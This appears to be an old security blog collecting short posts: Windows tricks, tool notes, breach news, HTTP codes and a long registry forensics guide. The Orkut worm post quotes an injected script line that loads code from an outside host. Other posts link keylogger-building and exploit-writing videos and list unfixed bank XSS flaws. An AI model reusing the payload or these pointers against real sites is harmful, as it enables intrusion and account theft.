Security Tools and Tricks

SQL Injection Attacks and Defense

2010-07-25T22:54:00.000-07:00

its one of the books to catch, as SQL injection is on top charts of OWASP,

Can be easily found on torrents for review ;)

Windows 7 God Mode

2010-07-16T01:29:00.000-07:00

Lol.. what is god mode? i asked my self ... GodMode reminds me of shooting Games .. lol

Well we are talking abt windows

Getting Godmode is so Easy

1)Create a new folder

2)rename it to GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}

There u have a god mode .. so easy isn't it

visual C# Video Training .. its Good for Beginers

2010-07-16T00:28:00.000-07:00

http://www.heroturko.org/tutorials/other-tutorials/286789-video2brain-visual-c-2008-video-training.html

How Keyloggers Work in C++

2010-07-15T23:54:00.000-07:00

Video 1 : Developing The Skeleton

Video 2 : Intercepting The Key Strokes

Video 3 : Saving The Keystrokes

Video 4 : Dealing With a Few Exceptions

Video 5 : Adding Stealth

http://hotfile.com/list/679714/97add5a

Detecting Load Balancers

2009-06-26T08:06:00.001-07:00

While penetration testing we might require to find the load balancers on the site, it's pretty complicated to find the no of load balancers,
there is a good tool that comes in handy, it's halberd

installation
------------
# tar -xzvf halberd-0.2.3.ta.gz
# python setup.py install

running:
--------
# halberd www.site.com
or
# halberd

[tut] Exploiting writing tutorial

2009-01-24T01:52:00.000-08:00

here is a video of making a small exploit

hope u will enjoy this…

http://rapidshare.com/files/186194137/exploit.part1.rar

http://rapidshare.com/files/186210843/exploit.part2.rar

http://rapidshare.com/files/186196866/exploit.part3.rar

[ low res ]

http://rapidshare.com/files/186713908/Destiny_media_player_BOF.wmv

Fun with CLSID

2008-12-13T02:23:00.000-08:00

My Computer

[Paste it run box]
Explorer /E,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}

Explanation: The object My Computer is a namespace which has the CLSID: {20D04FE0-3AEA-1069-A2D8-08002B30309D}

Control Panel

Explorer /N,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{21EC2020-3AEA-1069-A2DD-08002B30309D}

Explanation: The Control Panel object whose CLSID is: {21EC2020-3AEA-1069-A2DD-08002B30309D} is a sub-object of My Computer.

Printers and telecopiers

Explorer /N,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{21EC2020-3AEA-1069-A2DD-08002B30309D}\::{2227A280-3AEA-1069-A2DE-08002B30309D}

Fonts

Explorer /N,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{21EC2020-3AEA-1069-A2DD-08002B30309D}\::{D20EA4E1-3957-11d2-A40B-0C5020524152}

Scanners and Cameras

Explorer /N,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{21EC2020-3AEA-1069-A2DD-08002B30309D}\::{E211B736-43FD-11D1-9EFB-0000F8757FCD}
Network Neighbourhood

Explorer /N,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{21EC2020-3AEA-1069-A2DD-08002B30309D}\::{7007ACC7-3202-11D1-AAD2-00805FC1270E}

Administration Tools

Explorer /N,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{21EC2020-3AEA-1069-A2DD-08002B30309D}\::{D20EA4E1-3957-11d2-A40B-0C5020524153}

Tasks Scheduler

Explorer /N,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{21EC2020-3AEA-1069-A2DD-08002B30309D}\::{D6277990-4C6A-11CF-8D87-00AA0060F5BF}

Web Folders

Explorer /N,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11D0-BCED-00A0C90AB50F}

My Documents

Explorer /N,::{450D8FBA-AD25-11D0-98A8-0800361B1103}

Recycle Bin

Explorer /N,::{645FF040-5081-101B-9F08-00AA002F954E}

Network Favorites

Explorer /N,::{208D2C60-3AEA-1069-A2D7-08002B30309D}

Default Navigator

Explorer /N,::{871C5380-42A0-1069-A2EA-08002B30309D}

Computer search results folder

Explorer /N,::{1F4DE370-D627-11D1-BA4F-00A0C91EEDBA}

Network Search Results computer

Explorer /N,::{E17D4FC0-5564-11D1-83F2-00A0C90DC849}

HSBC web sites are open to critical XSS attacks. Warning to customers!

2008-11-05T09:34:00.001-08:00

Evidently, major unwanted consequences could be a result of multiple cross-site scripting vulnerabilities affecting bank web sites. XSS must be considered as the phishers' future weapon by all people working in the security industry.

Scammers can register domains and set up fake bank web sites in a few minutes. With the help of bulk e-mailers they can phish personal sensitive data from thousands of unsuspecting web users.

If they want to own HSBC's e-banking customers, all they have to do is to register a "suspicious" looking domain like hscsbc.com which is currently available and then serve a phishing page.
Even better, they can exploit a cross-site scripting vuln on hsbc.com, obfuscate the attack vector and significantly increase their phishing success rate!

Updated: 23/06/08:
www.investdirect.hsbc.gr XSS notified by Hexspirit
www.investdirect.hsbc.gr XSS notified by Hexspirit
www.hsbc.com.sv XSS notified by sl4xUz
www.hsbc.com XSS notified by Airrox
-
www.hsbc.co.uk XSS notified by PaPPy / unfixed
www.hsbc.com.tr XSS notified by DaiMon / unfixed since 26/05/2008
www.hbeu1.hsbc.com XSS notified by DaiMon / unfixed since 26/05/2008
www.hsbc.com.tr XSS notified by Babaconda / unfixed since 25/05/2008
www.hsbcprivatebankfrance.com XSS notified by ironzorg / unfixed since 25/04/2008
www.hsbc.fi.cr XSS notified by Venom23 / unfixed since 26/02/2008
www.hsbc.com XSS notified by Darkster / published on 26/07/2007 - fixed on 12/09/2007
monavenir.hsbc.fr XSS notified by takethis /published on 01/04/2007 - fixed on 21/08/2007

Protect your customers' privacy and security now! Leaving site-specific vulnerabilities open for days, weeks or months, can lead to substantial financial losses! :-/

We suggest that you subscribe your online properties to the XSS early warning mailing list.

Related News (Updated):
"HSBC scripting flaws play into the hands of phishers", John Leyden, The Register, 25 Jun 08
"HSBC sites vulnerable to XSS flaws, could aid phishing attacks", Dancho Danchev, 29 Jun 08

ICANN and IANA domains hijacked by Turkish crackers

2008-11-05T09:32:00.000-08:00

The ICANN and IANA websites were defaced earlier today by a Turkish group called "NetDevilz". ICANN is responsible for the global coordination of the Internet's system of unique identifiers. These include domain names, as well as the addresses used in a variety of Internet protocols.

The Internet Assigned Numbers Authority (IANA) is responsible for the global coordination of the DNS Root, IP addressing, and other Internet protocol resources.
Their domains were redirecting to a hosting space at "atspace.com" where the defacers left the following message:

"You think that you control the domains but you don't! Everybody knows wrong. We control the domains including ICANN! Don't you believe us?"

Hijacked domains include "icann.com", "icann.net", "iana.com" and "iana-servers.com".

We reached the defacers by email but they refused to tell us how they changed the DNS records, however a cross-site scripting or cross-site request forgery vulnerability might have been exploited.

Here is the mirror of the ICANN.com defacement:
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,0/id,7635102/

You can have a look at their other defacements here:
http://www.zone-h.org/component/option,com_attacks/Itemid,43/filter_defacer,NetDevilz/

Original News:
http://www.zone-h.org/content/view/14973/1/

New Orkut XSS worm by Brazilian web security group

2008-11-05T09:28:00.000-08:00

Security researchers Octane[F/X], Rodrigo Lacerda and Klay Gomes were able to hack again Orkut with their new XSS worm.
http://www.xssed.com/files/Image/xssworms/orkutxss.zip
The photo commentary parameter was not properly filtered, thus allowed insertion of this malicious script:
---------------------
a=document.createElement('SCRIPT');a.src='http://octanefx.com/bugOrkut.js';document.getElementsByTagName('head').item(O).appendChild(A);

----------------------
This worm joined victims to some communities, left Orkut scraps to community members, added victims to friends lists, changed their profile picture and infected all of their personal photos. Therefore, anyone who visited an infected photo album, got infected.

Firefox users were vulnerable to attack. Opera and some versions of IE were not affected.

Good news is that it doesn't work anymore, Google once again fixed it in record time.

For educational purposes we uploaded a zip file containing all the worm's associated JavaScript codes.

Memoryze This

2008-11-05T09:14:00.000-08:00

At the Hack in the Box security conference in Malaysia Wednesday, Mandiant’s Peter Silberman announced the release of Mandiant’s newest free tool for incident response and forensic investigations. The tool, Memoryze, is the latest memory analysis tool for first responders to consider adding to their toolkit for acquiring physical memory from running Windows systems. This summer, we saw the release of several other tools to do the same thing, but they stopped short at providing the ability to acquire a forensic image (or copy) of physical memory. Memoryze goes further and provides advanced analysis capabilities of both physical memory from live, running Windows systems and memory images previously acquired from running systems.

I spent a couple hours working with Memoryze in the wee hours of this morning and found it to be quite powerful. It acquires memory quickly and writes it in a raw format that can be read by the other memory analysis tools like the Volatility Framework. I tested Memoryze's ability to read physical memory images acquired by itself, Mantech’s mdd, Guidance Software's winen and win32dd. Note: For winen, I had to convert Encase format to a raw dd format using FTK Imager first. I didn't have any problems analyzing all four images acquired by the various tools. Additionally, I tested Volatility with similar success.

Gizmox Dares Hackers to Break Into Visual WebGui Application

2008-11-05T09:13:00.001-08:00

Gizmox, http://www.visualwebgui.com the developer of Visual WebGui open source platform, today announced a contest, sponsored by the Company, which will pay $10,000 to anyone who can hack into its Visual WebGui Platform. The Contest will take the shape of an investigation into the identity of a secret agent. The goal of the contest is to uncover the true identity of their secret agent, code named OWL. The Contest will feature a flash movie presented within the Visual WebGui application that will contain the data necessary to uncovering the identity of the OWL. Participants will be required to provide a reproducible pathway into the Visual WebGui Pipeline (without having to penetrate any non Visual WebGui Peripherals) in order to claim the prize. The contest will begin on November 3rd and end January 30th, Participants must register to receive login information and contest details.

This is the location of the Security Challenge: http://www.visualwebgui.com/live/Security_Challenge

Undocumented Cisco commands

2008-11-04T09:28:00.000-08:00

Surfing the web, I have found a document concerning the undocumented cisco commands.
The document is write by Lars Fenneberg (CCIE #7325) and it’s quite old (last revision in 2005).
Certainly this is not a complete list, but I suppose that could be funny to discover some new commands…
I have tried to found other document more exhaustive with no result.

The original document can be found on http://www.elemental.net/~lf/undoc/

The Internet evolution: IPv4 to IPv6

2008-11-04T09:20:00.001-08:00

This visualization represents macroscopic snapshots of the IPv4 and IPv6Internet topologies observed during the first week of January 2008.It simultaneously illustrates the peering richness of each topology and the worldwide distribution of nodes in each routing system.

The IPv4 data was collected between January 2nd and 17th 2008 by 13 CAIDA archipelago monitors located in 13 different cities, 11 countries, and 3continents. The monitors probed paths toward 48M /24 networks spread across 95% of the prefixes seen in Route Views Border Gateway Protocol (BGP) routing tables on 1 January 2008.

The IPv6 data was collected between January 1st and 8th 2008 by volunteers responding to a request sent to the North American Network Operators’ Group (NANOG) mailing list. There were 56 contributors, in 53 different cities, 9 countries, and 3 continents. They used the scamper command-line tool to probe 2,358 IPv6 destinations spread across 822 prefixes or 81% of the prefixes seen by RIPE NCC on 1 January 2008.

The IPv6 graph with 486 ASes remains much smaller than the IPv4 graph with 18,753 ASes. While the IPv4 graph’s central core is still dominated by American ASes, the IPv6 graph center is more balanced between America and Europe. A European ISP Tiscali (3257) has replaced the previously highest ranking AS, NTT (2914), since our last IPv6 Internet AS core graph in 2005.

Although NTT is a Japanese telecommunication company, the address space it uses for AS 2914 comes from the American company Verio, which NTT purchased in 2000. The fact that the largest AS in the IPv6 graph is European and that the other European ASes are comparable in degree to the American ASes reflects the wider adoption of IPv6 outside the United States.

More info on http://www.caida.org/…/ascore-ipv4-ipv6.200801.poster.pdf

Certified Ethical Hacking maps

2008-06-18T02:04:00.000-07:00

Mindmaps are good enough for getting the complete overview of the topic.

http://www.mindcert.com/resources/MindCert_CEH_Ethical_Hacking_MindMap.pdf
http://www.mindcert.com/resources/MindCert_CEH_Footprinting_MindMap.pdf
http://www.mindcert.com/resources/MindCert_CEH_Scanning_MindMap.pdf
http://www.mindcert.com/resources/MindCert_CEH_Enumeration_MindMap.pdf
http://www.mindcert.com/resources/MindCert_CEH_System_Hacking_MindMap.pdf

Learn and Test your hacking skills

2008-06-16T00:29:00.000-07:00

This site is very good if you want to test your skills against real world,
pls don/t abuse the site

http://hackme.ntobjectives.com/

IRIS Network Analyzer (sniffer)

2008-06-15T05:13:00.000-07:00

Iris_network_analyser.rar

http://rapidshare.com/files/84693305/Iris_network_analyser.rar
Size: 5348 KB

Forensic Analysis Flow Chart

2008-05-17T03:52:00.000-07:00

Iam posting a forensic flow chart, which explains about when to start and stop the forensic investigation process

http://www.cybercrime.gov/forensics_chart.pdf

Online Penetration Testing

2008-04-22T03:06:00.000-07:00

These are some of the online tools that can be used for Information gathering

whois,trace,dns

http://networking.ringofsaturn.com/Tools/
http://network-tools.com/
http://www.t1shopper.com/tools/

namp online
http://nmap-online.com/

location finder
http://www.geobytes.com/IpLocator.htm
http://www.iplocationfinder.com/location.htm

tcp/ip port scan
http://www.topwebhosts.org/tools/portscan.php

HTTP Error codes

2008-04-22T02:34:00.000-07:00

here are some of the HTTP Error codes that can help u in log analysis

Information codes

100 - The request was successful. The process can now continue.
101 - The request for the server to switch protocols was accepted, such as a switch from ftp to http.

Success Codes

200 Info OK
201 Info Created
202 Info Accepted
203 Info Non-Authoritative Information
204 Info No Content
205 Info Reset Content
206 Info Partial Content

Detailed Info

200 - The item requested of the server is available (keep in mind, available, not accepted or completed).
201 - A new address has been created through the use of form posting, perl, cgi, etc..
202 - The request has been accepted (keep in mind that the request has been accepted, not completed).
203 - The information received is not from the server that the information was requested from, but from another source.
204 - There was no content to be given for the request. For instance if you click on a hyperlink, imagemap, or button that isn't linked to anything or doesn't do anything.
205 - A script has reset the displayed content.
206 - Only partial content has been displayed. This could be due to bandwidth, poor caching, bad html, or other reasons

Redirection codes

300 Info Multiple Choices
301 Info Moved Permanently
302 Info Found
303 Info See Other
304 Info Not Modified
305 Info Use Proxy
307 Info Temporary Redirect

Detailed Info

300 - You will either get a choice of pages or an error message when this occurs. The address is actually pointing to two multiple files and/or locations.
301 - The requested page has been permanently moved. The server will automatically redirect you to the new location.
302 - The requested page has been temporarily moved. The server will automatically redirect you to the new location.
303 - The requested data is stored in an alternate location and the GET method will be used to retrieve the data. If the actual error is returned then this may be due to a web server misconfiguration.
304 - The requested data has not been modified since the last request.
305 - The requested data may only be accessed via the use of a proxy server.
307 - The requested page has been moved. The server will automatically redirect you to the new location. Unlike Error 301 and 302 however, the server has not specified whether the move is temporary or permanent.

Client Error Codes

400 Info Bad Request
401 Info Unauthorized
402 Info Payment Required
403 Info Forbidden
404 Info Not Found
405 Info Method Not Allowed
406 Info Not Acceptable
407 Info Proxy Authentication Required
408 Info Request Timeout
409 Info Conflict
410 Info Gone
411 Info Length Required
412 Info Precondition Failed
413 Info Request Entity Too Large
414 Info Request-URI Too Large
415 Info Unsupported Media Type
416 Info Requested Range Not Satisfiable
417 Info Expectation Failed

Detailed Info

400 - The request was denied due to a syntax error in the request.
401 - Your IP address or the username/password you entered were not correct. Your request was denied as you have no permission to access the data.
402 - The data is not accessible at the time. The owner of the space has not yet payed their service provider.
403 - Your IP address or the username/password you entered were not correct. Your request was denied as you have no permission to access the data.
OR
The server was unable to serve the data that was requested.
404 - The document that has been requested either no longer exists, or has never existed on the server.
405 - The method you are using to access the document is not allowed. Possible methods include:
CONNECT,DELETE,GET,HEAD,OPTIONS,POST,PUT,TRACE.
406 - The client (webbrowser) does not accept the document format. The formats that may be specified not to accept are charset, encoding, certain file types, languages, or ranges.
407 - The browser has not been authenticated on the required proxy server to access the data. This error is probably most commonly returned by content filters/parental controls.
408 - The server has closed the socket due to communications between the client and server taking too long. This could be due to server load, bandwidth issues, the client being disconnected from the internet, etc.
409 - Too many requests for the same file at one time.
OR
There is a conflict with an established software rule. (ie: you are trying to copy over a file with an older version, or you do not have permissions to delete a file)
OR
This could be caused by a DNS issue.
410 - This is like a 404 error in that the document requested is not on the server, however this differs in that the server 'knows' that the file used to be there and 'believes' that the file may be back, so it returns 410 rather 404.
411 - When trying to send a document to the server the server did not recieve a Content-Length specification in the header.
412 - A precondition setting required by the client or server has not been met.
413 - The process is too large to process. (ie: a file you are trying to upload is too large to fit on the server, or a webpage you are trying to download is too large for the server to process)
414 - The URL requested is simply too long. It is most likely more than 1024, 2048, or 4096 characters in length.
415 - This usually occurs if the server does not support the type of media the client is requesting. (ie: the server does not support streaming media, but streaming media is on the server and the client is attempting to access it)
416 - The client request included a range for acceptable file size, however the document requested did not fit into that range.
417 - The client's expect header requested certain server behaviors that the server could not perform.

Server Error Codes

500 Info Internal Server Error
501 Info Not Implemented
502 Info Bad Gateway
503 Info Service Unavailable
504 Info Gateway Timeout
505 Info HTTP Version not supported

Detailed info

500 - The server encountered an error. This is most often caused by a scripting problem, a failed database access attempt, or other similar reasons.
501 - The method you are using to access the document can not be performed by the server. Possible methods include:
CONNECT,DELETE,GET,HEAD,OPTIONS,POST,PUT,TRACE.
502 - The document requested resides on a 3rd party server and the original server received an error from the 3rd party server.
503 - The server is overloaded or down for maintenance and due to this was unable to process the client request.
504 - Most likely the client has lost connectivity (disconnected from the internet) or the cleint's host is having technical difficulties. This could also mean that a server that allows access to the requested server is down, having bandwidth/load issues, or otherwise unavailable.
505 - The server does not support the HTTP version used by the client. (This usually occurs if the server is using an OLDER version of HTTP than the client.)

Forensic Analysis of windows

2008-04-17T02:20:00.000-07:00

Examination Tools:

Currently, there are many tools available to forensic examiners for extracting evidentiary information from the Registry. The tool used in this paper to analyze and navigate the registry is Registry Editor (regedit.exe). Registry Editor is free and available on any installation of Microsoft Windows XP with administrator privileges.

The Registry as a Log:

All Registry keys contain a value associated with them called the “LastWrite” time, which is very similar to the last modification time of a file. This value is stored as a FILETIME structure and indicates when the Registry Key was last modified. In reference to the Microsoft Knowledge Base, A FILETIME structure represents the number of 100 nanosecond intervals since January 1, 1601. The LastWrite time is updated when a registry key has been created, modified, accessed, or deleted. Unfortunately, only the LastWrite time of a registry key can be obtained, where as a LastWrite time for the registry value cannot.

Harlan Carvey, author of Windows Forensics and Incident Recovery, refers to a tool called Keytime.exe, which allows an examiner to retrieve the LastWrite time of any specific key. Keytime.exe can be downloaded from http://www.windows-ir.com/tools.html.

Knowing the LastWrite time of a key can allow a forensic analyst to infer the approximate date or time an event occurred. And although one may know the last time a Registry key was modified, it still remains difficult to determine what value was actually changed. Using the Registry as a log is most helpful in the correlation between the LastWrite time of a Registry key and other sources of information, such as MAC (modified, accessed, or created) times found within the file system. However, a comprehensive discussion of that process is outside the scope of this paper.

Autorun Locations:

Autorun locations are Registry keys that launch programs or applications during the boot process. It is generally a good practice to look here depending on the case of examination. For instance, if a computer is suspected to have been involved in a system intrusion case, autorun locations should be looked at. If the user denies their involvement then it’s possible their own system was compromised and used to initiate the attack. In a case such as this, the autorun locations could prove that the system had a trojan backdoor installed leaving it vulnerable for an attacker to use at their discretion.

List of common autorun locations:

HKLM\Software\Microsoft\Windows\CurrentVersion\Runonce

HKLM\Software\Microsoft\Windows\CurrentVersion\policies\Explorer\Run

HKLM\Software\Microsoft\Windows\CurrentVersion\Run

HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Run

HKCU\Software\Microsoft\Windows\CurrentVersion\Run

HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce

(ProfilePath)\Start Menu\Programs\Startup

MRU lists:

MRU, or “most recently used” lists contain entries made due to specific actions performed by the user. There are numerous MRU lists located throughout various Registry keys. The Registry maintains these lists of items incase the user returns to them in the future. It is basically similar to how the history and cookies act to a web browser.

One example of an MRU list located in the Windows Registry is the RunMRU key. When a user types a command into the “Run” box via the Start menu, the entry is added to this Registry key. The location of this key is HKCU\Software\Microsoft\Windows\ CurrentVersion\Explorer\RunMRU and its contents can be seen in Figure 2. The chronological order of applications executed via “Run” can be determined by looking at the Data column of the “MRUList” value. The first letter of this is “g”, which tells us that the last command typed in the “Run” window was to execute notepad. Also, the LastWrite time of the RunMRU key will correlate with the last application executed in “Run”, or in this case application “g”.

With the information provided from the RunMRU key, an examiner can gain a better understanding of the user they are investigating and the applications that are being used. In reference to Figure 2, it is apparent the user has sufficient knowledge of the Windows operating system – based on applications that have been executed, such as msconfig, cmd, sysedit, and regedit.

Locations of other MRU lists that may be useful in a forensic analysis. This list is by no means conclusive.
XP Search Files

Software\Microsoft\Search Assistant\ACMru\5603

Internet Search Assistant

Software\Microsoft\Search Assistant\ACMru\5001

Printers, Computers and People

Software\Microsoft\Search Assistant\ACMru\5647

Pictures, music, and videos

Software\Microsoft\Search Assistant\ACMru\5604
XP Start Menu - Recent

Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs

R. Desktop - Connect

Software\Microsoft\Terminal Server Client\Default [MRUnumber]
Run dialog box

Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU

Regedit - Last accessed key

Software\Microsoft\Windows\CurrentVersion\Applets\Regedit

Regedit - Favorites

Software\Microsoft\Windows\CurrentVersion\Applets\Regedit\Favorites

MSPaint - Recent Files

Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Recent File List

Mapped Network Drives -

Software\Microsoft\Windows\CurrentVersion\Explorer\Map Network Drive MRU

Computer searched via Windows Explorer

Software\Microsoft\Windows\CurrentVersion\Explorer\FindComputerMRU

WordPad - Recent Files

Software\Microsoft\Windows\CurrentVersion\Applets\Wordpad\Recent File List

Common Dialog - Open

Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU

Common Dialog - Save As

Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU

WMP XP - Recent Files

Software\Microsoft\MediaPlayer\Player\RecentFileList

WMP XP - Recent URLs

Software\Microsoft\MediaPlayer\Player\RecentURLList

OE6 Stationery list 1 - New Mail

Identities\{C19958F2-22F3-4C6A-9AE0-12049CE0706F}\Software\Microsoft\Outlook Express\5.0\Recent Stationery List *the CLSID varies, just an example given

OE 6 Stationery list 2 - New Mail

Identities\{C19958F2-22F3-4C6A-9AE0-12049CE0706F}\Software\Microsoft\Outlook Express\5.0\Recent Stationery Wide List *the CLSID varies

PowerPoint - Recent Files

Software\Microsoft\Office\10.0\PowerPoint\Recent File List

Access - Filename MRU

Software\Microsoft\Office\10.0\Common\Open Find\Microsoft Access\Settings\File New Database\File Name MRU

FrontPage - Recent lists

Software\Microsoft\FrontPage\Explorer\FrontPage Explorer\Recent File List

Excel - Recent Files

Software\Microsoft\Office\10.0\Excel\Recent Files

Word - Recent Files

Software\Microsoft\Office\10.0\Word\Data

Reference to additional MRU lists: http://windowsxp.mvps.org/RegistryMRU.htm.

UserAssist:

The UserAssist key, HCU\Software\Microsoft\Windows\CurrentVersion \Explorer\UserAssist, contains two or more subkeys which have long hexadecimal names that appear as globally unique identifiers (GUIDs). Each subkey records values that pertain to specific objects the user has accessed on the system, such as Control Panel applets, shortcut files, programs, etc. These values however, are encoded using a ROT-13 encryption algorithm, sometimes known as a Caesar cipher. This particular encryption technique is quite easy to decipher, as each character is substituted with the character 13 spaces away from it in the ASCII table. A much faster and easier method to decipher this code is with the use of an online ROT-13 decoder, such as http://www.edoceo.com/utilis/rot13.php.

– ROT-13 cipher decoded

With the UserAssist key, a forensic examiner can gain a better understanding of what types of files or applications have been accessed on a particular system. Even though these entries are not definitive, for they cannot be associated with a specific date and time, it may still indicate a specific action by the user.

For instance, in the example of Figures 3 and 3a the decoded value can show a potential amount of information. First, it tells the name of the user profile – “Cpt. Krunch” – from which the .exe was executed from. Cpt. Krunch could also indicate a handle or an alias of some sort. Second, by researching “p2ktools.exe”, it tells that it is a program used for editing and managing Motorola cell phones. Finally, it shows the user has the p2ktools folder in a parent directory called “Razor programs”, which is located on their desktop. Not only does this give the location of where similar programs may reside, but the name of this directory is a good indicator that the suspect has a Motorola Razor cell phone. If so, that too should be seized for further analysis.

Wireless Networks:

Wireless networks today are popular and are only becoming more popular. A wireless ethernet card picks up wireless access points within its range, which are identified by their SSID or service set identifier. When an individual connects to a network or hotspot the SSID is logged within Windows XP as a preferred network connection. Unsurprisingly, this can be found in the Registry in the HKLM\SOFTWARE\ Microsoft\WZCSVC\Parameters\Interfaces key. When opening this Registry key there may be subkeys beneath it, like UserAssist, that look like GUIDs. The contents of these should contain the values “ActiveSettings” and “Static#0000”. There may be additional values that begin with “Static#” and are sequentially numbered. In the binary data of these “Static#” values are the network SSIDs of all the wireless access points that system has connected to. This can be seen by right clicking the value and selecting “modify”, as shown in Figure 4.

In addition to logging the name of the SSID, Windows also logs the network settings of that particular connection – such as the IP address, DHCP domain, subnet mask, etc. The Registry key in which this can be found is HKLM\SYSTEM\ControlSet001\ Services\Tcpip\Parameters\Interfaces\, which is illustrated in Figure 4a.

Based on this wireless network information, a Forensic examiner can determine if a user connected to specific wireless access point, the timeframe, and their IP address they were assigned by the DHCP server. For instance, if it were a case about a child pornography suspect that was war-driving to various network connections and using them illegally, these methods would be very useful. Given the suspect’s computer to run an analysis on, would make it possible to see what network connections they were using and the IP address that was assigned to further support a subpoena of the ISP.

LAN Computers:

Windows XP implements a network mapping tool called My Network Place, which allows users to easily find other users within a LAN or Local Area Network. A computer on a properly configured LAN should be able to display all the users on that network through My Network Place. This list of users or computers, like many other things, is stored in the Registry. Therefore, even after the user is no longer connected to the LAN, the list of devices that have ever connected to that system still remain, including desktop computers, laptops, and printers. The Registry key where this information is stored is HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ComputerDescriptions.

The ComputerDescriptions key is useful in determining whether or not a user was connected to certain computers or belonged to a specific LAN. Figure 5 displays the output of this key.

USB Devices:

There is sufficient information on this topic to write an entire research paper on, however, for the scope of this paper only the basics will be discussed to show the most relevant Registry keys.

Anytime a device is connected to the Universal Serial Bus (USB), drivers are queried and the device’s information is stored into the Registry (i.e., thumb drives). The first important key is HKLM\SYSTEM\ControlSet00x\Enum\USBSTOR. This key stores the contents of the product and device ID values of any USB device that has been connected to the system. Figure 6 reveals the contents of this key. All of which can be interpreted – there lists an ipod, two external hard drives, a digital video camcorder, and several different thumb drives.

Figure 6 – Contents of USBSTOR key

Beneath each device is the Device ID, which is also a serial number. The serial numbers of these devices are a unique value assigned by the manufacturer, much like the MAC address of a network interface card. Therefore, a particular USB device can be identified to determine whether or not it has been connected to other Windows systems.

Harlan Carvey mentions in his article The Windows Registry as a Forensic Resource, an important consideration to keep in mind regarding USB device IDs. Not every thumb drive will have a serial number. Particularly, those that have an “&” symbol for the second character of the device ID. In reference to Figure 6, the Device ID that is pointed out has a serial number. However, if the “0” was an “&” that would indicate to an examiner that the device doesn’t have a designative serial number. An example of a device that doesn’t have an assigned serial number can be seen in Figure 6a, a Western Digital 250GB external hard drive.

Knowing what USB devices have been connected to a system can assist an examiner in collecting additional evidence that may be crucial to the investigation.

(Return to Contents)

Mounted Devices:

There is a key in the Registry that makes it possible to view each drive associated with the system. The key is HKLM\SYSTEM\MountedDevices and it stores a database of mounted volumes that is used by the NTFS file system. The binary data for each \DosDevices\x: value contains information for identifying each volume. This is demonstrated in Figure 7, where \DosDevice\F: is a mounted volume and listed as “STORAGE Removable Media”.

This information can be useful to a digital forensics examiner as it shows the hardware devices that should be connected to the system. Therefore, if a device is seen in the list of MountedDevices and that device isn’t physically in the system, it may indicate that the user removed the drive in attempt to conceal the evidence. In this case, the examiner would know they have additional evidence that needs to be seized.

Internet Explorer:

Internet Explorer is the native web browser in Windows operating systems. It utilizes the Registry extensively in storage of data, like many applications discussed thus far. Internet Explorer stores its data in the HKCU\Software\Microsoft\Internet Explorer key. There are three subkeys within the Internet Explorer key that are most important to the forensic examiner. The first is HKCU\Software\Microsoft\ Internet Explorer\Main. This key stores the user’s settings in Internet Explorer. It contains information like search bars, start page, form settings, etc. The second and most important key to a forensic examiner is HKCU\Software\Microsoft\ Internet Explorer\TypedURLs. This key stores all URLs that the user has typed into the address field of the web browser, which can give an examiner a fairly good idea as to what types of web addresses the user visits – unless the user goes into the Internet Options window and clicks “Clear History”. This action will subsequently delete the TypedURLs key entirely, which isn’t recreated until the user types a URL into the address field again. Figure 8 demonstrates the contents of what the TypedURLs key displays.

From this data an examiner could conclude that the user possibly has a gmail and hotmail email address, they engage in online banking at tdbanknorth, is interested in digital forensic websites, and that they perhaps go to college at Champlain and have been researching apartments in the area.

The third subkey that may interest an examiner is HKCU\Software\Microsoft\ Internet Explorer\Download Directory. This key reveals the last directory used to store a downloaded file from Internet Explorer, giving the examiner an idea as to the location of where the user stores their files.

Opera, Netscape, and Firefox:

It is the best to my knowledge that none of these browsers utilize the Registry in the way that Internet Explorer does. Internet Explorer stores web history in a file called Index.dat, which is referenced in the Windows Registry database – hence the reason we can see the history contents in the TypedURLs key.

Opera on the other hand, stores its history in a file called opera.dir. The default location of this file is C:\Documents and Settings\User Profile\Application Data\Opera\Opera\profile\. Upon installing and using this browser, the only remnants of Opera located in the Registry were install paths. In fact, according to the features of Opera (http://operawiki.info/WhyOpera), two of the many reasons people choose to use this browser is because it doesn’t use the registry to store data and the size of it is very small. It is only a 1.8mb executable and according to the “Add or Remove Programs” applet in Control Panel; the total installation is only 5.33mb.

Like Opera, Netscape and Firefox leave limited footprints (other then install paths) regarding Registry activity. Netscape and Firefox both store web history in a history.dat file, which is in ASCII format and plainly visible when opened. The location for the history.dat file in Firefox is C:\Documents and Settings\User Profile\Application Data\Mozilla\Firefox\Profiles\x.default\ and Netscape is C:\Documents and Settings\derrick.farmer\ Application Data\Netscape\NSB\Profiles\x.default\. An in-depth analysis of these browsers is out of the scope of this particular paper as they are not relevant in a Windows Registry examination.

P2P Clients:

Peer-to-Peer (P2P) networks are notorious of providing users with the ability to distribute illegal and sometimes unethical materials. Three popular P2P clients were downloaded, installed, used, and examined for the purpose of this research. The clients that were used are Limewire, Kazaa, and Morpheus.

Limewire:

The research conducted on Limewire was somewhat inconclusive in regards to a Registry examination. There were very minimal footprints of user activity and no logs of searches or downloaded files could be found. The most helpful thing discovered in the Registry was install paths of the program. Knowing this information would give the exact location of where to look in the file system. In a default installation of Limewire the location of the install directory is C:\Program Files\Limewire and the share directory is C:\Documents and Settings\User Profile\Shared.

Kazaa:

